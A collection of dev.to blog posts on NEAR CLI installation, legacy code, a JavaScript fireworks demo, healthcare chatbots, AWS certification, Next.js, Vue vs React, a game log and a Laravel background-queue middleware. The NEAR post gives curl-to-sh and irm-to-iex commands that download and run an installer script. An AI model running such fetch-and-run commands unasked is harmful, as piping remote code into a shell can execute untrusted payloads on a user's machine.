En el mundo de las programación es muy importante contar con una herramienta que nos facilite en extremo operaciones del día como son: - Creación de cuentas: Mainnet y Testnet. - Creación de subcuentas; Mainnet y Testnet. - Transferencia de tokens: Fungibles y no fungibles. - Desplegar contratos: Mainnet y Testnet. - Ejecución de los métodos de los contratos: Métodos de lectura y métodos de escritura. En NEAR tradicionalmente esto se hacía con el near-cli basado en Nodejs, pero NEAR pensando en hacer la vida más fácil a los dev ha sacado esta herramienta basada en RUST, lo cual la convierte en una herramienta más potente y eficiente 🤗. **Link de descarga:** [https://near.cli.rs/](https://near.cli.rs/) Por ahora este link hace una redirección al respositorio de código de github: [https://github.com/near/near-cli-rs](https://github.com/near/near-cli-rs) **Descarga e instalación:** ![Image description](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/9og7y7dnf8v77mkqjsy3.png) A la fecha del artículo relativamente hace poco salió una actualización del cliente con la versión 0.10.2, cuando lo vayan a bajar click en el último reléase para que bajen el cliente más actualizado. La forma más sencilla es bajando los binarios precompilados: _**Instalación en Linux y mac:**_ Ejecutar el comando: ``` curl --proto '=https' --tlsv1.2 -LsSf https://github.com/near/near-cli-rs/releases/download/v0.10.2/near-cli-rs-installer.sh | sh ``` **_Instalación en Windows:_** Ejecutar el comando: ``` irm https://github.com/near/near-cli-rs/releases/download/v0.10.2/near-cli-rs-installer.ps1 | iex ``` ![Image description](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/4sub0zh1s78s6vhwi7qr.png) ![Image description](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/3uti38s4hicaxglhs85m.png) A diferencia del cliente tradicional de near escrito en nodejs que por la dependencia de módulos puede ser muy grande este sólo ocupa 20 megas. **Manejo básico de cliente** Se escribe en consola el comando: ``` near ``` ![Image description](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/weu3xq1lczf72owfx5le.png) Como podemos observar a diferencia del cliente tradicional, este es mucho intuitivo y nos muestra que opciones tenemos, prácticamente es elegir que opción deseamos usar y seguir un paso a paso. **Creación de cuentas:** ![Image description](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/9elib6nmcp74tq6mcvh3.png) Seleccionamos la opción account y enter ![Image description](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/b4ho580vgd6z4p64mghc.png) Seleccionamos la opción create-account y enter ![Image description](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/lgft5hjr7hmvrfu5e9cg.png) Se puede dar la opción de sponsor-by-faucert-service o fund-myself, esto con el fin de poder crear una cuenta con un nombre memotectnico como nearcolombia.testnet y no un código hexadecimal de muy difícil memorización. ![Image description](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/orla81b38z8xb83uumeu.png) Para este caso elegimos que nos de fondos de la faucet ![Image description](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/fpod37uk2k2weu840fc7.png) Ponemos el nombre de la cuenta que deseamos crear, en este caso nearcolombiadev.testnet ![Image description](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/7tvo6wya7eajtoo6gcan.png) Si no estamos seguros elegimos que nos verifique si esta cuenta no existe ![Image description](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/5drzbmn58ntnj4l07wlj.png) Ponemos que las llaves las genere automáticamente ![Image description](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/yr91459zkavc1zij419p.png) Elegimos la primera opción a no ser que se quiera guardar una compatibilidad con el cliente de Nodejs y se pone la segunda opción. ![Image description](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/8p7e2ebl2x9zo8hv3m2z.png) En este caso elegimos testnet ![Image description](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/fzail1ud32kp2aawb8qw.png) Aparece un resumen de lo que vamos a realizar y se procede con la opción créate. ![Image description](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/hoiluwx3ya4w9b2he955.png) Finalmente se crea la cuenta, aparece el link de la transacción y como se puede crear la cuenta con una instrucción completa y sin paso a paso. Al entrar al link de la transacción verificamos que todo está creado correctamente. ![Image description](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/kyhfobl1pijut3asdmnc.png) **Cómo ver el saldo de una cuenta** ![Image description](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/nbf5p0j5p0rezzs9rnon.png) Entramos a near, opción de _cuentas->view-account-summary->_ ponemos la cuenta que queremos ver->si de es de testnet o mainnet->la altura del bloque o en el último bloque. En conclusión el nuevo cliente cumple a cabalidad las necesidades que se necesitan día a día como desarrollador y es sumamente intuitivo. Sólo es seguir las instrucciones paso a paso para hacer lo que necesitamos sin tener que memorizar ningún comando en especial.
sergiotechx
1,906,996
Entendendo Código Legado: Uma Abordagem Prática
Disclaimer Este texto foi concebido pela IA Generativa em função da transcrição do episódio do nosso...
0
2024-07-01T00:07:57
https://dev.to/asouza/entendendo-codigo-legado-uma-abordagem-pratica-4bdk
**Disclaimer** Este texto foi concebido pela IA Generativa em função da transcrição do episódio do nosso canal, Dev Eficiente. [O episódio completo pode ser visto no canal.](https://youtu.be/qontPwNQVLk) ## Introdução Neste post eu quero mostrar para você um exemplo prático do processo de entendimento de um código legado. Imagine que você acabou de chegar em uma empresa nova, que tem um código legado consideravelmente complexo, e você agora precisa entender esse código para começar a fazer suas atividades no dia a dia. Como fazer? ## A Teoria por Trás da Prática Eu fiz uma combinação do mundo acadêmico com o mundo real. Encontrei um artigo científico, que tem mais de mil citações, formando uma teoria sobre como você pode fazer uma abordagem para entender um código legado. Esse artigo, intitulado "Towards a Theory of the Comprehension of Computer Programs", é um texto antigo de 1983, mas ainda muito relevante. Ele define um processo básico e as variáveis que influenciam nesse processo. ## Aplicando a Teoria no Mundo Real Peguei a teoria do artigo e apliquei em uma situação real. Baixei o código do framework Spring. Queria entender como funciona o processo de resolução do Spring quando chega uma rota e ele tem que invocar um método de um controlador mapeado. ## Processo de Verificação O autor do artigo, Reuven Brooks, descreve que todo o processo de entendimento de código começa com a definição de uma hipótese primária. A partir dessa hipótese, você parte para o processo de verificação, buscando dicas dentro do código que corroborem ou refutem a hipótese. Durante esse processo, você pode derivar novas hipóteses e refiná-las. ## Estratégias de Compreensão Existem três variáveis que influenciam na sua habilidade em entender um código legado: - Especialização na Tecnologia: Quanto mais especializado você for na tecnologia, mais facilidade terá em navegar na base de código. - Conhecimento sobre o Domínio: Entender o problema que o software resolve facilita a formulação de hipóteses. - Estratégias de Compreensão: Diferentes pessoas podem ter diferentes estratégias de compreensão, e algumas podem ser mais eficazes que outras. ## Exemplo Prático No meu exemplo, comecei olhando para os testes de unidade do Spring, especificamente buscando por algo relacionado a "handler mapping". Encontrei um teste que instanciava um "simple URL handler mapping". A partir daí, usei uma estratégia de colocar breakpoints no código para entender o fluxo de execução. ## Conclusão Lidar com código legado é uma atividade padrão na vida de desenvolvedores. Quase nunca estamos na posição de começar algo do zero. Ter uma estratégia bem definida para avançar no entendimento pode acelerar, sua capacidade de gerar valor num ambiente novo. Espero que este post tenha ajudado a entender melhor como aplicar teorias acadêmicas na prática para compreender códigos legados. Até a próxima! **PS:** Se você gostou, deixe um comentário. Se não gostou e tem um comentário construtivo, deixe também. Vou ter o maior prazer em responder.
asouza
1,906,994
🎆 Light Up Your Browser: Creating a Dazzling Fireworks Display with JavaScript and Canvas
Hey there, fellow code enthusiasts! 🎉 Are you ready to add some sparkle to your web projects? Today,...
0
2024-06-30T23:54:22
https://dev.to/best_codes/light-up-your-browser-creating-a-dazzling-fireworks-display-with-javascript-and-canvas-8fg
javascript, webdev, tutorial, opensource
Hey there, fellow code enthusiasts! 🎉 Are you ready to add some sparkle to your web projects? Today, we're diving into the world of digital pyrotechnics with a spectacular fireworks display that you can create right in your browser! _In case you didn't know already, July 4th is Independence Day in the USA._ Happy (early) Independence Day! ![gif](https://media3.giphy.com/media/v1.Y2lkPTc5MGI3NjExNmhyeW1oaHNoMmtzZjE1cDRxOGRhMnlsMXNsaDV2dmZ3dndnZTdxaiZlcD12MV9pbnRlcm5hbF9naWZfYnlfaWQmY3Q9Zw/XzqKDBwYRsLI6UZLMc/giphy.webp) **Already excited? Check out the source code for the project here! [https://github.com/The-Best-Codes/the-best-codes.github.io/tree/main/devto/projects/2024_july_4th](https://the-best-codes.github.io/BC_LATS/?url=https://github.com/The-Best-Codes/the-best-codes.github.io/tree/main/devto/projects/2024_july_4th)**. [Demo project here](https://the-best-codes.github.io/devto/projects/2024_july_4th/?demo=dev.to) ## 🎆 The Magic Behind the Explosions Our fireworks display is powered by the dynamic duo of JavaScript and HTML5 Canvas. We'll be using object-oriented programming to create realistic firework behavior, complete with launch trails, explosions, and even sound effects! ## 🚀 Launching into Action The heart of our display is the `Firework` class. Each firework starts its journey from the bottom of the screen, propelled by a velocity vector. As it ascends, it leaves behind a shimmering trail of particles. When the firework reaches its target height or starts to fall, BOOM! It explodes into a burst of colorful particles. ```javascript class Firework { constructor(x, y) { // Initialize firework properties // ... playRandomSound(launchSounds); } explode() { // Create explosion particles // ... playRandomSound(explosionSounds); } // Other methods... } ``` ## ✨ The Particle Party The `Particle` class is responsible for the individual sparks that make up our fireworks. Each particle has its own color, velocity, and lifespan. Some particles even have a chance to shimmer, adding an extra layer of realism to our display. ```javascript class Particle { constructor(x, y, color, velocity) { // Initialize particle properties // ... this.shimmer = Math.random() < 0.3; // 30% chance of shimmer } // Other methods... } ``` ## 🎵 Sound Effects for the Win To make our fireworks display truly immersive, we've added sound effects for both the launch and explosion. The `playRandomSound` function selects a random sound from an array, ensuring variety in our audio experience. ## 🖌️ Painting the Night Sky The `animate` function is where the magic happens. It clears the canvas, updates and draws each firework, and occasionally creates new fireworks. The result is a continuous, randomized display that's sure to captivate your users. ## 👆 Interactive Fun Want to add your own fireworks to the show? No problem! We've added a click event listener that creates a new firework wherever you click on the canvas. ```javascript canvas.addEventListener("click", (event) => { fireworks.push(new Firework(event.clientX, event.clientY)); }); ``` ## 🚀 Launch Your Own Fireworks Display Ready to light up your own projects? Here's how you can get started: 1. Copy the provided HTML, CSS, and JavaScript code. [Source Code Here](https://the-best-codes.github.io/BC_LATS/?url=https://github.com/The-Best-Codes/the-best-codes.github.io/tree/main/devto/projects/2024_july_4th) 2. Create a new HTML file and paste the code. 3. Add the necessary sound files to an "assets" folder. 4. Open the HTML file in your browser and enjoy the show! Remember to experiment with the code. Try changing colors, adding new particle shapes, or even syncing the fireworks to music! **💡 Pro Tip:** This fireworks display can be a great addition to celebration pages, New Year's countdown timers, or as a reward animation in games; not just Independence Day! So, what are you waiting for? Let's paint the digital sky with code and create some unforgettable web experiences! Happy coding, and may your projects always sparkle! ✨🎆 ---- _Article by [BestCodes](https://the-best-codes.github.io?dev.to=2024-i_day) with the assistance of the BestCodes AI. BestCodes AI runs on the Claude-3.5-Sonnet AI model, one of the many awesome models you can use affordably at [https://convoai.tech](https://convoai.tech?r=dev.to&u=best_codes)._
best_codes
1,906,993
Role of Healthcare Chatbots in 2023: Revolutionizing Patient Care
Healthcare chatbots are AI-driven virtual helpers created to offer health- related information,...
27,673
2024-06-30T23:50:51
https://dev.to/rapidinnovation/role-of-healthcare-chatbots-in-2023-revolutionizing-patient-care-h79
Healthcare chatbots are AI-driven virtual helpers created to offer health- related information, assistance, and services to patients, medical professionals, and the broader population. They employ natural language processing (NLP), natural language understanding (NLU), and machine learning to interpret user inquiries and produce suitable replies. The use of healthcare chatbots is rapidly growing, and the global projected market for healthcare chatbots is expected to reach $943.64 million by 2030, with a CAGR of 19.16% from 2022 to 2030. In 2023, healthcare chatbots are poised to revolutionize patient care by providing accessible and personalized healthcare advice, reducing wait times, and improving patient engagement. This article will explore the significant role of healthcare chatbots in the medical industry in 2023 and beyond. ## Patient Triage and Appointment Scheduling Chatbots are widely used for initial patient assessment, helping to determine the severity of the patients’ symptoms and guiding them to the appropriate care. They also facilitate appointment scheduling, making the process more convenient for patients and reducing administrative burdens on healthcare staff. Studies show that chatbot implementation reduces waiting time by 52% and triage activity by 64%, ensuring timely care and better patient outcomes. ## Mental Health Support Chatbots have been increasingly adopted to provide mental health support to patients, serving as the first point of contact for individuals seeking help. They offer coping strategies, and direct users to appropriate resources or professional care. Popular mental health chatbots include Woebot, Wysa, and Replika. While chatbots can be a useful tool for managing symptoms, they cannot replace professional mental health support. ## Appointment Management AI chatbots help in managing appointments by automating the scheduling process. Integrated with the Electronic Health Record system, they manage appointments seamlessly, handle repetitive tasks like data entry, and facilitate secure data sharing among healthcare providers. Medical chatbots comply with security and privacy regulations such as HIPAA, ensuring that sensitive patient information is protected. ## Health Education and Awareness Chatbots have become essential for disseminating accurate and timely health information, addressing common questions, and dispelling misconceptions. Studies suggest that healthcare chatbots can be an effective tool for promoting health education and awareness, improving patient outcomes, and reducing healthcare costs. ## Post-Discharge Care and Follow-Up Chatbots assist in monitoring patients after discharge, providing guidance on care plans, and answering questions related to recovery and medications. They offer reminders for follow-up appointments, medication schedules, and monitor symptoms, improving patient outcomes and reducing hospital readmissions. ## Medication Adherence and Chronic Condition Management AI conversational chatbots remind patients to take their medications and track their adherence. They provide personalized advice, motivation, and support for individuals managing chronic conditions. Popular chatbots in this category include Pillo Health, Catalia Health, and AiCure. ## Chatbot Support for Dementia Treatment Studies show that chatbots are significantly impacting dementia patients and their caregivers. AI-powered chatbots understand the conversation’s emotions, tonality, and context, providing emotional support to some extent. While they cannot replace caregiving, they can significantly enhance the experience of patients and relieve caregivers of various commitments. ## Future Insights: Healthcare Chatbot Development 2023 and Beyond The medical chatbot market is growing rapidly, expected to reach USD 944.65 million by 2032. These conversational AI chatbots are taking healthcare to the next level by allowing remote patient monitoring, prescription records, reminders, and more. Start building your personalized chatbots today. 📣📣Drive innovation with intelligent AI and secure blockchain technology! Check out how we can help your business grow! [Blockchain App Development](https://www.rapidinnovation.io/service- development/blockchain-app-development-company-in-usa) [Blockchain App Development](https://www.rapidinnovation.io/service- development/blockchain-app-development-company-in-usa) [AI Software Development](https://www.rapidinnovation.io/ai-software- development-company-in-usa) [AI Software Development](https://www.rapidinnovation.io/ai-software- development-company-in-usa) ## URLs * <http://www.rapidinnovation.io/post/role-of-healthcare-chatbots-in-2023-revolutionizing-patient-care> ## Hashtags #HealthcareChatbots #AIinHealthcare #PatientCare2023 #DigitalHealth #MedicalInnovation
rapidinnovation
1,906,576
AWS Certification Prep Tips
Hello everyone, Barbora here! In 2022, I enrolled in the She Builds program here in...
0
2024-06-30T23:46:57
https://dev.to/barbora_klusackova/aws-certification-prep-tips-2303
aws, certification, cloudpractitioner, careerdevelopment
## Hello everyone, Barbora here! In 2022, I enrolled in the She Builds program here in Auckland, New Zealand. At that time, I was a stay-at-home mom with two little kids, **no tech background**, and searching for a new challenge on my career path. The She Builds program changed my life. In four weeks, I became an AWS Certified Cloud Practitioner. A year later, I became an AWS Solutions Architect Certified, and in 2024, I graduated as a Software Developer! Since then, AWS has become my favourite brand. Here is how I tackled my certification exams. <br> ## AWS Certified Cloud Practitioner (CLF-CO2) Exam <br> ### Who should take this exam, and why? This exam is an excellent **starting point** for anyone looking to use AWS services, especially those with minimal or no prior experience. In today's environment, there are high expectations for Junior Developers and cloud knowledge is often seen as an advantage. Obtaining certifications can help you stand out from other candidates. ### How long does the preparation take? I prepared for this exam with four weeks of intensive learning. I didn’t have any AWS or tech experience before. This time frame might be a bit tight for newbies, so take your time. However, **schedule a due date** if you want to take this commitment seriously. Mark in your calendar when you want to finish your learning, or even better, the day you want to take your exam. I decided I wanted to take the exam in four weeks, so I set up my learning plan and booked the exam (yes, I like to be a little bit under pressure 😅). ![Time management](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/vncdl6lr7da2pw8q9cxx.png) ### From which resources did I learn? There are many approaches to preparing for the exam. One of the most important things is to choose your learning path and stick to it. There are so many resources and people who can give you plenty of advice that you might start to feel nervous in the middle of your learning journey, wondering if you are following the best approach. So, **stick to your chosen approach** and do not jump from one resource to another. Also, consider finding a study buddy, this can make a big positive difference in your learning journey. I started with official AWS study materials - some of them are free, and some of them are open with a subscription. I used these two free resources: - [Cloud Practitioner Essentials](https://explore.skillbuilder.aws/learn/course/external/view/elearning/134/aws-cloud-practitioner-essentials) - [Cloud Practitioner Full Quiz Review](https://explore.skillbuilder.aws/learn/course/external/view/elearning/14703/aws-skills-centers-becoming-a-cloud-practitioner-full-quiz-review) The other part of my learning involved using the Tutorial Dojo Tests, which I purchased on Udemy. There are six tests in the package. Once you finish a test, you can go through each question with detailed explanations about why the correct answer is right and why the others are not. I learned the most from this process. After going through the explanations for every question from the first test, I applied the same approach to the rest of them. My pace was two tests per week. <br> ![Tutorial Dojo](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/fzo2z3rufhb0f67p7kdy.png) <br> Whenever an AWS service was mentioned in a test, I went to the console to explore it further. This hands-on practice helped me understand the services better. I believe this part is crucial for future success—while the certificate looks great on LinkedIn, what really matters are the actual skills and knowledge. I started with a 42% success rate on the first test 😬. By the time I finished the last one, I had reached 82%, showing significant improvement. It's important not to try to memorize the questions and answers, as the official exam questions are similar but not identical. AWS tests are designed to ensure a genuine understanding of the concepts. <br> [![AWS Console](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/6cffs33vn997ggl79ai6.png)](https://aws.amazon.com/console/) <br> ### 👩‍💻 Exam Day You have the option to choose between taking the exam from home or at a testing centre. If you decide to take it from home, you need to ensure your internet connection is stable, there are no interruptions, and you'll have to show your surroundings to the supervisor by moving your computer around the room. Personally, I opted to take the exam at a testing centre for convenience and peace of mind. I received my result in 42 hours. ### How much does the exam cost? As of June 30, 2024, the exam costs $100 USD. Sometimes AWS offers discounts for Cloud Practitioner exams, especially when you participate in programs like She Builds or similar. Last year, there was an opportunity to retake the exam for free, but I'm uncertain if this option is still available. If you need to retake your exam, before purchasing another voucher, consider researching this option through Google or asking in the AWS community or on LinkedIn. There is a chance that you may not pass the exam. It can be disappointing, I know. Once you receive the results, you'll see the areas where you weren't successful. This will guide you on what to focus on when reviewing. If this happens, **don't give up**. I know many fantastic people who didn't pass on their first try but succeeded on their second attempt. ### Recap - Build a learning plan and set a deadline - Stick to your learning path - Find your exam buddy - this can really help! - Do not memorize questions and answers - Hands-on practice in AWS Console - Share your Certificate Badge!! ### Conclusion Remember, certification exams can be challenging, but they are also opportunities for growth. Whether you pass on your first attempt or not, each step in your learning journey matters. Stay focused, utilize the resources available to you, and don't hesitate to reach out to the vibrant AWS community for support and guidance. Best of luck on your certification journey! Embrace the challenge, celebrate your progress, and keep striving for your goals in cloud computing and beyond!! <br> ![Cloud Practitioner Badge](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/08q5ogugekwzg74wov7s.png) <br> ### Resources List - [Cloud Quest](https://explore.skillbuilder.aws/learn/course/internal/view/elearning/11458/aws-cloud-quest-cloud-practitioner) - [Tutorial Dojo AWS Cheat Sheets](https://tutorialsdojo.com/aws-cheat-sheets/) - [Tutorial Dojo Tests on Udemy](https://www.udemy.com/course/aws-certified-cloud-practitioner-practice-tests-clf-c02/?couponCode=LETSLEARNNOWPP) - [AWS Certification Website with useful resources](https://aws.amazon.com/certification/certified-cloud-practitioner/?c=sec&sec=resources) - [Cloud Guru](https://www.pluralsight.com/cloud-guru) ### Other good quality resources for consideration which I didn't use but my friends did! - [Whizlabs](https://www.whizlabs.com/aws-certified-cloud-practitioner/) - [Stephane Maarek course on Udemy](https://www.udemy.com/course/aws-certified-cloud-practitioner-new/?couponCode=KEEPLEARNING) ### People and Pages to Follow - [Viktoria Semaan] (https://www.linkedin.com/in/semaan/recent-activity/all/) - [Tech with Lucy] (https://www.linkedin.com/in/lucywang-/recent-activity/all/) - [She Builds](https://www.linkedin.com/groups/13977813/) ### AWS Meetups in Auckland - [Auckland AWS Community Meetups](https://www.meetup.com/aws_nz/) - [Auckland AWS Tools and Programming](https://www.meetup.com/auckland-aws-tools-meetup/) - [AWS Cloud Club in Auckland - for students](https://www.meetup.com/aws-cloud-club-in-auckland/)
barbora_klusackova
1,906,992
On To The 'Next' Journey!
What is Next.js? Server-Side-rendering(SSR) Static and Dynamic...
0
2024-06-30T23:45:31
https://dev.to/tahj_monet_/on-to-the-next-journey-2nf5
1. What is Next.js? 2. Server-Side-rendering(SSR) 3. Static and Dynamic Rendering 4. Client-Side-rendering(CSR) 5. Use Client 6. App Router 7. Tips and Tricks **> What is Next.js?** Next.js is a popular React framework(tools, libraries) that allows fast, high-performing, scalable, and search-engine-friendly web apps. It’s mainly used for building web pages and is designed to enable server-side rendering and static site generation, providing a range of features and optimizations outside the box. Next.js offers several great benefits, with the biggest being its ease of use and how quickly it handles data fetching. Built on top of React, Next.js makes your life easier with simple file-based routing and automatic code splitting. You can create routes just by adding files to the `pages` directory, no complicated setup is needed. It also has hot-reloading, which lets you see your changes instantly without refreshing the page, saving you loads of time. Next.js also makes data fetching fast with server-side rendering (SSR) and static site generation (SSG). With SSR, it fetches data on the server, loads the page with the data, and then sends it to the client. On the other hand, SSG creates HTML at build time, so your content is ready and waiting for users immediately. These features make your website load faster and run smoother, giving users a better experience. You can even style Next.js using tailwind.css, which makes the designing process simple and concise. There is no need to label each div in your return statements, just add your styling directly on the tag! > **SSR** Let's Talk more about Next.js key uses, like Server-side-rendering (SSR): Server-side rendering? Yes! That’s a thing. It allows developers to create hybrid applications where parts of the application can be on the server and parts can be on the client. Server-side rendering is similar to client-side-rendering(CSR, when the front end has to wait for instructions from the server to render details), except SSR renders web pages on the server and sends them to the client’s browser. A few key benefits of SSR include: - fewer resources since the server handles most of the rendering - smaller bundles by using Code splitting (divides the JavaScript code into multiple smaller bundles) - improving load time and performance - Search Engine Optimization (SEO). ![SSR](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/16ow9ljebj4jafmdnb7t.jpeg) > **STATIC & DYNAMIC RENDERING** SSR also involves two kinds of rendering, static and dynamic. With static rendering, Next.js usually renders data from the database as a static page which means it renders data while building out your code for your project. By default, Next.js will cache the fetched data, either from an API or database, by using the fetch function, but Next.js also allows you to disable cache which will also change how the page renders. Instead, it will switch to dynamic rendering, rendering the page at the requested time. > **CSR** Client-side rendering is still the same old process where the client waits for instructions from the server to render the data on the client's browser. You’re probably wondering why not just use one or the other. Although SSR is fantastic, there are a few important factors that server-side components cannot manage, for example, state or effect hooks, browser features like “onClick” or n react"onChange", or other aspects of the browser APIs. This is why we often use a mixture of client and server components, we only use client components when needed. > **Use client** Inside of client-side components, we want to make sure that we state the ‘use client’ import at the top of the file ensuring that any client-side specific behavior is correctly handled. This provides clarity and consistency especially when using Event listeners (like onClick,onChange, etc.) which should only be attached in the client environment. Also, remember that the ‘use client’ import doesn't mean that every child wrapped in a component will use the client side, but if the component is dynamic, it’s best to still wrap the children. ![visual of using 'use client'](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/789jylccm76jib6inqcp.jpeg) > **APP ROUTER** Following. These are the key differences between JS and React/javascript, React uses JSX, a syntax extension that allows HTML-like code to be written within JavaScript and the way Routing works is different! Provided by the App Router(a system that handles routing by mapping URL paths to corresponding components or pages, making navigation within the application seamless and efficient), it uses the file system to provide routing for a Next.js application. In other words, you don’t need to create endpoints like you might in Express, or create a folder that holds all your routing, routes are automatically generated based on your file system, usually stored in the layout.tsx page! ![routing system](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/p5zzqrk1wmb0tnz5nhpk.png) Pretty cool, right? > **TIPS AND TRICKS** Utilize these resources to get your feet wet and explore as you go about your journey in learning next.js, I guarantee you will be able to create something you never even thought you could! Using next.js over JavaScript has been such a lifesaver! Remember, It's designed to make your development process smoother and your applications faster and more efficient. Don't feel intimidated by the process of learning; with the right mindset and these resources, you'll be amazed at what you can achieve. Check out these amazing guides below to kickstart your journey and learn more about Next.js! - Programming with Mosh https://www.youtube.com/watch?v=ZVnjOPwW4ZA&t=2397s - Code With Antonio https://www.youtube.com/watch?v=2aeMRB8LL4o&t=5984s - Codecademy - Learn Next.js https://www.codecademy.com/enrolled/courses/learn-next-js
tahj_monet_
1,906,931
Frontend Technologies - Vue.js and React.js
Frontend technologies plays an important role in web development as they enable the creation of...
0
2024-06-30T23:39:28
https://dev.to/elijahhub/frontend-technologies-vuejs-and-reactjs-4jp8
frontend, internship, hng11
Frontend technologies plays an important role in web development as they enable the creation of user-interactive elements of websites and applications. These technologies include frameworks and libraries that help developers build user interfaces more efficiently. Two popular frontend frameworks are Vue.js and React.js ## **Vue.js vs Angular** **Vue.js** Vue.js is an open-source JavaScript framework for building user interfaces and single-page applications. It offers a component-based architecture that allows the creation of reusable, modular UI components, promoting efficient and scalable development of interactive web applications. Vue.js is known for its simplicity, ease of integration, and robust ecosystem, making it a popular choice among frontend developers. **React.js** ReactJS is a JavaScript library developed by Facebook for creating interactive graphical user interfaces on single-page applications. It focuses on component-based architecture, enabling reusability across various parts of an application. ## **Comparism** **Similarities** **1. Architecture:** Both React.js and Vue.js employ a component-based architecture where UI elements are broken down into reusable components, promoting modularity and reusability across applications. **2. State Management:** React.js manages component state using hooks like useState for functional components. Vue.js implements reactive data binding and provides a Vuex library for centralized state management, ensuring efficient data flow within components. **3. Event Handling:** Both frameworks facilitate event handling to manage user interactions, ensuring responsive and interactive user interfaces. **4. Open Source:** React.js and Vue.js are both open-source projects with large communities that contribute to continuous improvement of the framework. **5. Rendering:** Both frameworks support efficient client-side rendering, enhancing performance by optimizing updates to the virtual DOM (React.js) or leveraging Vue’s reactivity system. **Differences** **1. Data Binding:** React.js promotes one-way data flow where data flows downward from parent to child components, simplifying the debugging process. While Vue.js supports both one-way and two-way data binding, offering flexibility with v-model for form input binding and simplifying state management. **2. Virtual DOM vs. Reactivity:** React.js uses a virtual DOM to optimize rendering performance by tracking changes and updating only the necessary components. While Vue.js implements a reactivity system where changes to data automatically reflect in the DOM, reducing the need for manual DOM manipulations and improving developer productivity. **3. Dependencies:** React.js uses libraries like Redux for advanced state management or React Router for routing needs. While Vue.js uses Vue Router for routing and Vuex for state management, streamlining development without needing external dependencies. **4. Language:** React.js primarily uses JSX(JavaScript XML) syntax. While Vue.js uses template syntax with HTML-based templates and JavaScript for logic. **5. Purpose:** React.js focuses on building interactive UI components for web applications. While Vue.js aims at simplifying frontend development by providing a progressive framework for building user interfaces. **## My Expectation in HNG11 Internship **As a frontend developer specializing in React.js, Having been granted the opportunity to participate in the HNG11 internship. My expectations for this experience are centered around advancing my skills and knowledge in React.js, exploring more advanced techniques, and gaining practical experience in applying React.js to real-world projects. [HNG INTERSHIP]( https://hng.tech/internship) [HNG](https://hng.tech/hire) **## How I Feel About Using Reactjs** React's usage of reusable components impresses me since it offers a way to better handle complex code and potential errors while speeding the developing process.
elijahhub
1,906,986
[Game of Purpose] Day 43 - 2 cameras
Today I added a 1st person camera to a Drone, which you can toggle between using "c"...
27,434
2024-06-30T23:33:24
https://dev.to/humberd/game-of-purpose-day-43-2-cameras-769
gamedev
Today I added a 1st person camera to a Drone, which you can toggle between using "c" key. Unfortunately there are 3 problems: 1. It is attached to a Drone, so it inherits its rotation, so when it moves forward the camera also tilts backwards. It should stay still despite tilting. 2. When I move the camera to the very bottom it just glitches for a few seconds and then inverts the steering (you can see at the end of the video). 3. It should be locked to rotate only up certain degrees. There is no point in rotating and seeing Drone's belly. {% embed https://youtu.be/9TUEN9GWw3Y %}
humberd
1,906,984
Cronless queue:work in Laravel executed in background
There are some approaches how to execute queue:work but I found them useless. Here is a solution for...
0
2024-06-30T23:28:56
https://dev.to/ordigital/cronless-queuework-in-laravel-executed-in-background-2n01
laravel, webdev, cron, php
There are some approaches how to execute `queue:work` but I found them useless. Here is a **solution for most shared hostings** that: - does not require additional route - does not require remotely visiting website - does not require shell access - does not require cron access - requires `bash` with `flock` on server (for single execution protection) - requires PHP `exec` function available - requires shell `php` command (`php-cli` installed on server) - **runs in the background so makes no website slowdowns** - can be set to **execute not more than once between minimum time span** of $runEverySec seconds ## 1. Let's create new Middleware: ```bash $ php artisan make:middleware QueueWorkMiddleware ``` ## 2. Use it as global middleware in `bootstrap/app.php`: ```php ... ->withMiddleware(function (Middleware $middleware) { $middleware->append(App\Http\Middleware\QueueWorkMiddleware::class); }) ... ``` ## 3. Put contents to `App/Middleware/QueueWorkMiddleware.php`: ```php <?php namespace App\Http\Middleware; use Closure; use Illuminate\Http\Request; use Symfony\Component\HttpFoundation\Response; class QueueWorkMiddleware { // lock file that prevents too many executions public $lockFile = 'queue.lock'; // log from queue command public $logFile = 'queue.log'; // log from background exec command public $execLogFile = 'exec.log'; // pid of executed command public $pidFile = 'queue.pid'; // php command path public $phpExec = '/usr/bin/php'; // queue:work command public $queueCmd = 'artisan queue:work --stop-when-empty'; // minimum time in seconds between executions public $runEverySec = 10; /** * Handle an incoming request. * * @param \Closure(\Illuminate\Http\Request): (\Symfony\Component\HttpFoundation\Response) $next */ public function handle(Request $request, Closure $next): Response { // get pid and lock file names $pidFile = base_path()."/".$this->pidFile; $lockFile = base_path()."/".$this->lockFile; if( // if there is no lock file and !file_exists($lockFile) && // there is no pid file (queue was never executed before) // or time between pidfile modification is more or equal $runEverySec (!file_exists($pidFile) || (time()-filemtime(base_path()."/{$this->pidFile}") >= $this->runEverySec)) ) { // do the work $this->work(); } return $next($request); } public function work() { // file names $basePath = base_path(); $lockFile = "{$basePath}/{$this->lockFile}"; $logFile = "{$basePath}/{$this->logFile}"; $execLogFile = "{$basePath}/{$this->execLogFile}"; $pidFile = base_path()."/".$this->pidFile; // main queue command and lock file removal $cmd = "{ {$this->phpExec} {$this->queueCmd} > {$logFile} 2>&1; rm {$lockFile}; }"; // go to base path and run command by flock (this guarantees single execution only!) $cmd = "cd {$basePath} && flock -n {$lockFile} --command '{$cmd}'"; // execute command in background exec(sprintf("%s > {$execLogFile} 2>&1 & echo $! >> %s", $cmd, $pidFile)); return true; } } ```
ordigital
1,906,982
